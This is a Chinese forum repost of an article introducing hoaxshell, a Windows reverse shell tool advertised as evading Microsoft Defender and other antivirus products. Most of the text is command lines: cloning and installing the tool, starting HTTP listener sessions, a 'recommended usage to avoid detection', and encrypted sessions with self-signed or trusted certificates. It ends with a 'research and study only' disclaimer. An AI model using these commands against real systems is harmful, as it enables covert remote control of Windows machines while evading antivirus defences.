Windows反向shell -- hoaxshell

wangqiang · 发表于 2022-9-6 23:07:39

本帖最后由 wangqiang 于 2022-9-6 23:11 编辑

Windows反向shell -- hoaxshell
t3l3machus web安全工具库
2022-09-06 00:00 发表于河南
转载自：Windows反向shell -- hoaxshell

项目作者：t3l3machus
项目地址：https://github.com/t3l3machus/hoaxshell

0x01 工具介绍
hoaxshell 是一种非常规的 Windows 反向 shell，目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到，因为它完全
基于 http(s) 流量。该工具易于使用，它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

0x02 安装与使用
1、安装需要的库文件

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

复制代码

2、通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

复制代码

3、避免检测的推荐用法（通过 http）

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

复制代码

4、加密的 shell 会话 (https)

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

复制代码

5、具有可信证书的加密 shell 会话

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key

复制代码

6、抓取会话模式

sudo python3 hoaxshell.py -s <your_ip> -g

复制代码

0x03 下载地址
1、通过项目地址下载
2、关注web安全工具库公众号，后台回复：20220906

0x04 声明
仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者不承担任何法律及连带责任。

		自动登录	找回密码
密码			立即注册